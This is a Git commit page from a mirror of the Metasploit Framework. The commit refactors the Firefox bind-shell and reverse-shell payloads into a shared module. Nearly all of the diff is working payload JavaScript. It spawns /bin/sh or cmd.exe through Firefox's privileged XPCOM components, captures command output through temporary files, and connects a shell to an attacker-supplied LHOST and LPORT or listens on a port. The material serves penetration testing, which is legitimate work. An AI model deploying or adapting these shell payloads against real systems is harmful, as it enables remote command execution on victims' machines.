infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

DRYs up firefox payloads.

bug/bundler_fix
Joe Vennix 2014-01-02 02:20:54 -06:00
parent 821aa47d7e
commit 1f9ac12dda
3 changed files with 81 additions and 128 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

74
lib/msf/core/payload/firefox.rb Normal file
View File

@ -0,0 +1,74 @@
# -*- coding: binary -*-
require 'msf/core'
module Msf::Payload::Firefox
def read_file_source
%q|
var readFile = function(path) {
try {
var file = Components.classes["@mozilla.org/file/local;1"]
.createInstance(Components.interfaces.nsILocalFile);
file.initWithPath(path);
var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"]
.createInstance(Components.interfaces.nsIFileInputStream);
fileStream.init(file, 1, 0, false);
var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"]
.createInstance(Components.interfaces.nsIBinaryInputStream);
binaryStream.setInputStream(fileStream);
var array = binaryStream.readByteArray(fileStream.available());
binaryStream.close();
fileStream.close();
file.remove(true);
return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("").trim();
} catch (e) { return ["",""]; }
};
|
end
def run_cmd_source
%q|
var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
.getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
var runCmd = function(cmd) {
var shPath = "/bin/sh";
var shFlag = "-c";
var shEsc = "\\\\$&";
if (ua.indexOf("Windows")>-1) {
shPath = "C:\\\\Windows\\\\system32\\\\cmd.exe";
shFlag = "/c";
shEsc = "\\^$&";
}
var stdoutFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
var stderrFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
var stdout = Components.classes["@mozilla.org/file/directory_service;1"]
.getService(Components.interfaces.nsIProperties)
.get("TmpD", Components.interfaces.nsIFile);
stdout.append(stdoutFile);
var stderr = Components.classes["@mozilla.org/file/directory_service;1"]
.getService(Components.interfaces.nsIProperties)
.get("TmpD", Components.interfaces.nsIFile);
stderr.append(stderrFile);
var sh = Components.classes["@mozilla.org/file/local;1"]
.createInstance(Components.interfaces.nsILocalFile);
sh.initWithPath(shPath);
var shell = shPath + " " + shFlag + " " + (cmd + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc);
var process = Components.classes["@mozilla.org/process/util;1"]
.createInstance(Components.interfaces.nsIProcess);
process.init(sh);
process.run(true, [shFlag, shell], 2);
return [readFile(stdout.path), readFile(stderr.path)];
};
|
end
end

70
modules/payloads/singles/firefox/shell_bind_tcp.rb
View File

@ -9,11 +9,13 @@
require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/core/payload/firefox'
require 'msf/base/sessions/command_shell'
module Metasploit3
include Msf::Payload::Single
include Msf::Payload::Firefox
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
@ -45,23 +47,16 @@ module Metasploit3
%Q|
(function(){
Components.utils.import("resource://gre/modules/NetUtil.jsm");
var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
.getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
var lport = #{datastore["LPORT"]};
var rhost = "#{datastore['RHOST']}";
var serverSocket = Components.classes["@mozilla.org/network/server-socket;1"]
.createInstance(Components.interfaces.nsIServerSocket);
serverSocket.init(lport, false, -1);
var clientFound = false;
var listener = {
onSocketAccepted: function(serverSocket, clientSocket) {
var outStream = clientSocket.openOutputStream(0, 0, 0);
var inStream = clientSocket.openInputStream(0, 0, 0);
if (clientFound) { outStream.close(); inStream.close(); }
client = true;
var pump = Components.classes["@mozilla.org/network/input-stream-pump;1"]
.createInstance(Components.interfaces.nsIInputStreamPump);
pump.init(inStream, -1, -1, 0, 0, true);
@ -81,65 +76,8 @@ module Metasploit3
};
};
var runCmd = function(cmd) {
var shPath = "/bin/sh";
var shFlag = "-c";
var shEsc = "\\\\$&";
if (ua.indexOf("Windows")>-1) {
shPath = "C:\\\\Windows\\\\system32\\\\cmd.exe";
shFlag = "/c";
shEsc = "\\^$&";
}
var stdoutFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
var stderrFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
var stdout = Components.classes["@mozilla.org/file/directory_service;1"]
.getService(Components.interfaces.nsIProperties)
.get("TmpD", Components.interfaces.nsIFile);
stdout.append(stdoutFile);
var stderr = Components.classes["@mozilla.org/file/directory_service;1"]
.getService(Components.interfaces.nsIProperties)
.get("TmpD", Components.interfaces.nsIFile);
stderr.append(stderrFile);
var sh = Components.classes["@mozilla.org/file/local;1"]
.createInstance(Components.interfaces.nsILocalFile);
sh.initWithPath(shPath);
var shell = shPath + " " + shFlag + " " + (cmd + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc);
var process = Components.classes["@mozilla.org/process/util;1"]
.createInstance(Components.interfaces.nsIProcess);
process.init(sh);
process.run(true, [shFlag, shell], 2);
return [readFile(stdout.path), readFile(stderr.path)];
};
var readFile = function(path) {
try {
var file = Components.classes["@mozilla.org/file/local;1"]
.createInstance(Components.interfaces.nsILocalFile);
file.initWithPath(path);
var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"]
.createInstance(Components.interfaces.nsIFileInputStream);
fileStream.init(file, 1, 0, false);
var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"]
.createInstance(Components.interfaces.nsIBinaryInputStream);
binaryStream.setInputStream(fileStream);
var array = binaryStream.readByteArray(fileStream.available());
binaryStream.close();
fileStream.close();
file.remove(true);
return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("").trim();
} catch (e) { return ["",""]; }
};
#{read_file_source}
#{run_cmd_source}
serverSocket.asyncListen(listener);
})();

65
modules/payloads/singles/firefox/shell_reverse_tcp.rb
View File

@ -14,6 +14,7 @@ require 'msf/base/sessions/command_shell'
module Metasploit3
include Msf::Payload::Single
include Msf::Payload::Firefox
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
@ -45,10 +46,6 @@ module Metasploit3
%Q|
(function(){
Components.utils.import("resource://gre/modules/NetUtil.jsm");
var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
.getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
var host = '#{datastore["LHOST"]}';
var port = #{datastore["LPORT"]};
@ -74,64 +71,8 @@ module Metasploit3
}
};
var runCmd = function(cmd) {
var shPath = "/bin/sh";
var shFlag = "-c";
var shEsc = "\\\\$&";
if (ua.indexOf("Windows")>-1) {
shPath = "C:\\\\Windows\\\\system32\\\\cmd.exe";
shFlag = "/c";
shEsc = "\\^$&";
}
var stdoutFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
var stderrFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
var stdout = Components.classes["@mozilla.org/file/directory_service;1"]
.getService(Components.interfaces.nsIProperties)
.get("TmpD", Components.interfaces.nsIFile);
stdout.append(stdoutFile);
var stderr = Components.classes["@mozilla.org/file/directory_service;1"]
.getService(Components.interfaces.nsIProperties)
.get("TmpD", Components.interfaces.nsIFile);
stderr.append(stderrFile);
var sh = Components.classes["@mozilla.org/file/local;1"]
.createInstance(Components.interfaces.nsILocalFile);
sh.initWithPath(shPath);
var shell = shPath + " " + shFlag + " " + (cmd + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc);
var process = Components.classes["@mozilla.org/process/util;1"]
.createInstance(Components.interfaces.nsIProcess);
process.init(sh);
process.run(true, [shFlag, shell], 2);
return [readFile(stdout.path), readFile(stderr.path)];
};
var readFile = function(path) {
try {
var file = Components.classes["@mozilla.org/file/local;1"]
.createInstance(Components.interfaces.nsILocalFile);
file.initWithPath(path);
var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"]
.createInstance(Components.interfaces.nsIFileInputStream);
fileStream.init(file, 1, 0, false);
var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"]
.createInstance(Components.interfaces.nsIBinaryInputStream);
binaryStream.setInputStream(fileStream);
var array = binaryStream.readByteArray(fileStream.available());
binaryStream.close();
fileStream.close();
file.remove(true);
return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("").trim();
} catch (e) { return ""; }
};
#{read_file_source}
#{run_cmd_source}
pump.asyncRead(listener, null);
})();